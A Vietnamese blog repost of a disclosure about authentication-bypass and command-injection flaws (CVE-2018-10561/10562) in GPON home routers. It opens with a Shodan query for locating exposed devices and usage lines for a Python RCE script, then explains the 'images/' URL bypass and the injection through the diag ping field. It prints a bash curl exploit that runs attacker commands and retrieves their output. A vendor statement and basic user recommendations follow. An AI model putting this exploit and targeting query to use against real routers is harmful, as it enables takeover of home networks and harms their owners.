Lỗ hổng RCE quan trọng được tìm thấy trong hơn một triệu GPON Home Router

Seach shodan title:"GPON Home Gateway" RCE on GPON home routers (CVE-2018-10561) https://github.com/f3d...






Seach shodan title:"GPON Home Gateway"
RCE on GPON home routers (CVE-2018-10561)

Usage

python gpon_rce.py TARGET_URL COMMAND

e.g.

python gpon_rce.py http://192.168.1.15 'id'

Video huong dan:
 





Hai cập nhật quan trọng kể từ khi báo cáo này được xuất bản:

  1. Nhóm nghiên cứu của chúng tôi đã tạo một bản vá có thể giúp người dùng thực hiện. Vui lòng kiểm tra tại đây
  2. Giải pháp DASAN Zhone đã gửi cho chúng tôi nhận xét của họ về báo cáo. Chúng tôi đính kèm nó "như là" ở cuối trang này

Tổng quan:

Chúng tôi đã tiến hành đánh giá toàn diện về một số bộ định tuyến GPON. Nhiều bộ định tuyến ngày nay sử dụng internet GPON và chúng tôi đã tìm cách vượt qua tất cả xác thực trên thiết bị ( CVE-2018-10561) Với việc bỏ qua xác thực này, chúng tôi cũng có thể tiết lộ một lỗ hổng tiêm lệnh khác ( CVE-2018-10562) và thực hiện các lệnh trên thiết bị .

Khai thác:

Trong quá trình phân tích các phần cứng GPON, chúng tôi đã tìm thấy hai lỗ hổng quan trọng khác nhau ( CVE-2018-10561 & CVE-2018-10562)  có thể, khi kết hợp cho phép điều khiển hoàn toàn trên thiết bị và do đó mạng. Lỗ hổng đầu tiên khai thác cơ chế xác thực của thiết bị có lỗ hổng. Lỗ hổng này cho phép bất kỳ kẻ tấn công nào bỏ qua tất cả xác thực.
Lỗ hổng có thể được tìm thấy với các máy chủ HTTP, kiểm tra các đường dẫn cụ thể khi xác thực. Điều này cho phép kẻ tấn công bỏ qua xác thực trên bất kỳ điểm cuối nào bằng cách sử dụng một thủ thuật đơn giản.
Bằng cách thêm hình ảnh / vào URL, kẻ tấn công có thể bỏ qua điểm cuối.
Điều này hoạt động trên cả hai trang HTML và GponForm /
Ví dụ: bằng cách chèn
/menu.html?images/
hoặc 
/ GponForm / diag_FORM? hình ảnh /
chúng tôi có thể quản lý thiết bị.
Trong khi xem xét các chức năng của thiết bị, chúng tôi nhận thấy điểm cuối chẩn đoán chứa các lệnh ping và traceroute. Nó đã không mất nhiều để tìm ra rằng các lệnh có thể được tiêm bởi các tham số máy chủ.
Vì bộ định tuyến lưu kết quả ping vào / tmp và truyền nó tới người dùng khi người dùng truy cập lại /diag.html, việc thực hiện các lệnh và truy xuất các đầu ra của họ bằng lỗ hổng bỏ qua xác thực là khá đơn giản.
Chúng tôi bao gồm phiên bản bash sau của mã khai thác: 
#! / Bin / bash
echo "[+] Gửi lệnh ..."
# Chúng tôi gửi các lệnh với hai chế độ backtick (`) và dấu chấm phẩy (;) vì các mô hình khác nhau kích hoạt trên các thiết bị khác nhau 
curl -k -d" XWebPageName = diag & diag_action = ping & wan_conlist = 0 & dest_host = \ ` $ 2 \ `; $ 2 & ipv = 0” $ 1 / GponForm / diag_Form? Images / 2> / dev / null 1> / dev / null 
echo “[+] Đang chờ….” 
Sleep 3 
echo “[+] Lấy ra ouput…. ” 
Curl -k $ 1 / diag.html? Hình ảnh / 2> / dev / null | grep 'diag_result =' | sed -e 's / \\ n / \ n / g'

Va chạm:

GPON là một loại mạng quang thụ động sử dụng sợi quang học và đặc biệt phổ biến. Khi mọi người sử dụng GPON, các bộ định tuyến được cung cấp bởi các ISP. Trong video, bạn có thể thấy rằng hơn một triệu người sử dụng loại bộ định tuyến hệ thống mạng này .
Chúng tôi đã thử nghiệm lỗ hổng này trên nhiều bộ định tuyến GPON ngẫu nhiên và lỗ hổng đã được tìm thấy trên tất cả chúng . Bởi vì rất nhiều người sử dụng các loại bộ định tuyến này , lỗ hổng này có thể dẫn đến toàn bộ sự thỏa hiệp mạng .

Khuyến nghị:

  1. Kiểm tra xem bộ định tuyến của bạn có sử dụng mạng GPON không.
  2. Hãy lưu ý rằng các bộ định tuyến GPON có thể bị tấn công và khai thác.
  3. Nói chuyện với ISP của bạn để xem họ có thể làm gì để sửa lỗi.
  4. Cảnh báo bạn bè của bạn trên Facebook ( bấm vào đây để chia sẻ ) và Twitter ( bấm vào đây để tweet ).

Cập nhật: Tuyên bố từ DZS về khai thác bỏ qua xác thực

DASAN Zhone Solutions, Inc. đã điều tra báo cáo phương tiện truyền thông gần đây rằng một số thiết bị giao diện mạng DZS GPON nhất định (NID), thường được gọi là bộ định tuyến, có thể dễ bị tấn công bỏ qua xác thực.
DZS đã xác định rằng dòng ZNID-GPON-25xx và một số H640series GPON ONTs, khi hoạt động trên các bản phát hành phần mềm cụ thể, bị ảnh hưởng bởi lỗ hổng này. Không có tác động dịch vụ nào từ lỗ hổng này đã được báo cáo cho DZS cho đến nay. Sau khi điều tra nội bộ, chúng tôi đã xác định tác động tiềm năng bị hạn chế nhiều hơn phạm vi hơn so với báo cáo của vpnMentor. Theo hồ sơ bán hàng của DZS, kết hợp với dữ liệu hiện trường được thu thập cho đến nay, chúng tôi đã ước tính rằng số lượng đơn vị GPON ONT có thể   bị ảnh hưởng tiềm năng ít hơn 240.000. Ngoài ra, với sự trưởng thành tương đối của các sản phẩm trong vòng đời của chúng, chúng tôi cho rằng tác động bị giới hạn ở các thiết bị thậm chí còn ít hơn.
Lịch sử sản phẩm
Các DZS ZNID-GPON-25xx và một số ONTs H640 nhất định, bao gồm phần mềm giới thiệu lỗ hổng này, được phát triển bởi một nhà cung cấp OEM và được bán lại bởi DZS. Được thiết kế và phát hành cách đây hơn 9 năm, hầu hết các sản phẩm này giờ đây đã qua tuổi thọ lâu dài. Bởi vì các hợp đồng hỗ trợ phần mềm không còn được cung cấp cho hầu hết các sản phẩm này, chúng tôi không có cái nhìn trực tiếp tới tổng số đơn vị vẫn đang được sử dụng tích cực trong lĩnh vực này.
Độ phân giải
DZS đã thông báo cho tất cả các khách hàng đã mua các mô hình dễ bị tổn thương này. Chúng tôi đang làm việc với từng khách hàng để giúp họ đánh giá các phương pháp để giải quyết vấn đề cho các đơn vị có thể vẫn được cài đặt trong lĩnh vực này. Nó sẽ tùy thuộc vào quyết định của từng khách hàng để quyết định cách giải quyết tình trạng cho thiết bị được triển khai của họ.
Nhiệm vụ của DZS là đảm bảo rằng tất cả các giải pháp của nó đáp ứng các tiêu chuẩn bảo mật cao nhất trong ngành. Chúng tôi nắm lấy điều này và mọi cơ hội, để xem xét và liên tục cải tiến các phương pháp thiết kế và thử nghiệm bảo mật của chúng tôi.
nguồn: https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/









Mua-ngay-asun_28042016100144

Liên Hệ: Mr.Trường

Hotline0888 39 7576



COMMENTS

Tên

.:: Connect Trojan ::.,111,.htaccess,2,0-day,3,2017,2,Add-on,16,Anotador,1,AutoIT,17,Ấn Độ,1,BackDoor,1,Bán Sách,13,banhangonline,1,Bảo Mật,108,Bất Động Sản Tại Tiền Giang,4,Bestsellers,13,Binder,1,blog,31,Blogger,4,Blogger Template,1,Botnet,3,Brute,1,Bug Bounty,1,Bypass,10,ceh,1,Châu Tinh Trì,2,Checked,6,Chiến tranh,2,Chrome,21,Code,5,coin hive,1,Coin-Hive,2,CoinHive,1,Connect Trojan,342,Connect Trojan ::.,1,Cổ Tích,2,Cổ Trang,11,Crack,3,Crypto,5,CSRF,5,CSS,2,Cuộc Sống,1,DDoS,6,Designer,1,Dich vụ,1,DNS,4,Download,2,du-an,2,DVD LUMION Tiếng Việt của anh Dũng Già Pro,1,Đam Mỹ,1,điện,1,Đồ Họa,215,Đô Thị,16,e11.me,1,ebook,13,ebook free,286,eBook Phệ Hồn Nghịch Thiên,1,eBook Thịnh Thế Địch Phi,1,Encrypt,1,Encryption,1,epub,77,epub [Tiên hiệp],1,ET-Logger,1,exploit,23,Exploitation,1,Extractor,2,facebook,69,FireFox,15,Flood,2,Forensic,7,full prc,2,game,177,Gerador,3,Gerenciador,1,Get Root,3,GHDB,3,Giả Tưởng,1,giaitri,1,Google,15,H&Y Shop,2,Hacker,3,Hacking,10,Hacking and Security,6,Hacking Tools,36,Hài hước,8,Hành Động,9,He Thong Site Phim,25,Hijacking,6,Hình Sự,5,hivecoin.hive coin,1,Hỏi Xoáy Đáp Xoay Trên VTV3,1,Hồng Kông,3,HTML,1,Huyền Ảo,92,Hướng dẫn Internet cơ bản,1,IFTTT,703,Imgur,2,Infographic,1,Information Disclosure,1,Internet Explorer,3,IT News,39,J2TeaM,29,J2TeaM Tools,9,JavaScript,6,Javascript Injection,3,Juno_okyo's Blog,23,Khóa Học,28,Khóa Học kiếm tiền online với accesstrade,5,khoá học miễn phí,16,Khóa học Photoshop,19,Khóa học sử dụng mã độc và phòng chống mã độc,1,Khoa Huyễn,6,khuyến mãi,8,kiemhiep,9,Kiếm Hiệp,20,Kiếm Tiền MMO,34,kiếm tiền rút gọn link,1,KilerRat,1,Kinh Dị,25,Kinh Dị - Ma,6,Kinh Doanh,73,kinhdi,1,kinhdoanh,5,KRACK Attacks,1,Lãng mạn,1,lazada,1,Lập trình,2,Lịch Sử,5,Linux,1,Local Attack,2,Logins/Cadastro,1,Lỗi Web,1,Lồng Tiếng,6,Lược Sử Hacker,2,Mã Giảm Giá,2,Mã Hóa,48,Malware,3,Master-Code,31,Máy Tính,1,Metasploit,2,Microsoft,4,mobile hacking,2,monero,1,Movie,25,MySQL,1,NEW PRODUCTS,19,NGHỆ THUẬT ẨN MÌNH,13,ngontinh,10,Ngôn Tình,151,nhà đất,1,Nhà Đất Gò Công,1,Nhân Vật Lịch Sử,2,Nhật Bản,1,Nhựt Trường Group,1,NjRat,5,Nước,1,open redirect,1,Oracle,1,Path Disclosure,2,pdf,77,Pen-Test,6,Pentest Box,9,phanmem,22,phanmemdienthoai,3,phanmemmaytinh,10,phần mềm,11,Phim 18,2,Phim 2012,1,Phim 3D,1,Phim Âm Nhạc,2,Phim Bộ,58,Phim Chiến Tranh,5,Phim Dã Sử - Cổ Trang,6,Phim Đài Loan,6,Phim Đang Cập Nhập,5,Phim Đề Cử,4,Phim Hài Hước,26,Phim Hàn Quốc,33,Phim HD Chất Lượng Cao,5,Phim Hoàn Thành,7,Phim Hoạt Hình,2,Phim Hot,2,Phim Hồng Kông,20,Phim HQ,15,Phim Kinh Dị,8,Phim lẻ,7,Phim Mới 2007,1,Phim Mới 2010,1,Phim Mới 2011,4,Phim Mới 2012,2,Phim Mới 2013,2,Phim Mới 2014,6,Phim Mới 2015,4,Phim Nhật Bản,4,Phim SD,12,Phim Thái Lan,6,Phim Thần Thoại,4,Phim Tình Cảm,35,Phim Trung Quốc,37,Phim Truyền Hình,32,Phim Viễn Tưởng,1,Phim Võ Thuật,36,Phim Xã Hội Đen,1,Phishing,5,PHP,16,Plugin,1,Port,1,post mẫu,1,prc,79,Programming,15,Python,1,Quảng Cáo,1,rat,457,Recovery,3,Remote Code Execution,1,Remote Desktop,1,Reverse Engineering,6,rút gọn link,1,sach,47,Sách,33,Sách Nghệ Thuật Sống,12,Sách Tâm Linh,1,Sách Tiếng Anh,2,sachiep,2,Sản Phẩm,1,Sắc Hiệp,16,Scam,1,Scanner,10,Security,66,SEO,5,share,1,Shell,5,Social Engineering,4,Software,22,Source Unity,1,SQL injection,21,Sức Khỏe,1,Symlink,3,Tài Chính,1,Tài Liệu,1,Tản mạn,7,Taudio,2,Tâm lý xã hội,1,tấn công,1,Testador,1,Thái Lan,2,Tham Khảo,3,thamkhao,11,Thành Long,1,them,1,Thiết Kế Web,28,Thời Trang,2,Thủ Thuật Hacking,53,Thuyết Minh,5,tienhiep,5,Tiên Hiệp,123,Tiểu Thuyết,100,tiki,3,TIL,8,Tin Tức,52,Tình Cảm - Tâm Lý,16,Tips,39,tool,1,Tool Hack,14,Tools,9,Tổng Hợp,1,Tricks,26,Trinh thám,1,Trinh Thám - Hình Sự,8,trojan original,48,Trọng sinh,11,Trộm mộ,1,Trung Quốc,9,Truyện,1,Trương Định,110,Tu Chân,2,TUTORIALS,124,TVB,3,Twitter,1,Ung_Dung,4,Upload,1,usb,1,vanhoc,11,văn học,6,vBulletin,7,video,16,Vietsub,3,Việt Nam,14,Virus,4,Võ Thuật,12,Võng Du,5,Vulnerability,19,Web Developer,15,webmau,5,WHMCS,3,WiFi,2,wiki lỗi máy tinh,1,wiki lỗi NTG,3,Windows,12,WordPress,43,Write-up,11,XSS,16,Yahoo,1,yeah1offer,1,youtube,11,
ltr
item
wWw.NhutTruong.Com: Lỗ hổng RCE quan trọng được tìm thấy trong hơn một triệu GPON Home Router
Lỗ hổng RCE quan trọng được tìm thấy trong hơn một triệu GPON Home Router
https://1.bp.blogspot.com/-Uop508m-HF4/WvOIgopsq5I/AAAAAAAAAYY/Ssmqz6Bv5cc7KDVguN1uB6Sfa-G_YBFJQCLcBGAs/s640/Nh%25E1%25BB%25B1t%2BTr%25C6%25B0%25E1%25BB%259Dng%2BGroup%2B2018-05-10_064855.jpg
https://1.bp.blogspot.com/-Uop508m-HF4/WvOIgopsq5I/AAAAAAAAAYY/Ssmqz6Bv5cc7KDVguN1uB6Sfa-G_YBFJQCLcBGAs/s72-c/Nh%25E1%25BB%25B1t%2BTr%25C6%25B0%25E1%25BB%259Dng%2BGroup%2B2018-05-10_064855.jpg
wWw.NhutTruong.Com
https://www.nhuttruong.com/2018/05/lo-hong-rce-quan-trong-uoc-tim-thay.html
https://www.nhuttruong.com/
https://www.nhuttruong.com/
https://www.nhuttruong.com/2018/05/lo-hong-rce-quan-trong-uoc-tim-thay.html
true
7607280272436897486
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow Đây là nội dung quý hiếm để tránh google quét chết link Vui lòng đăng nhập Facebook hoặt Tweet để like và share để hiện link Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy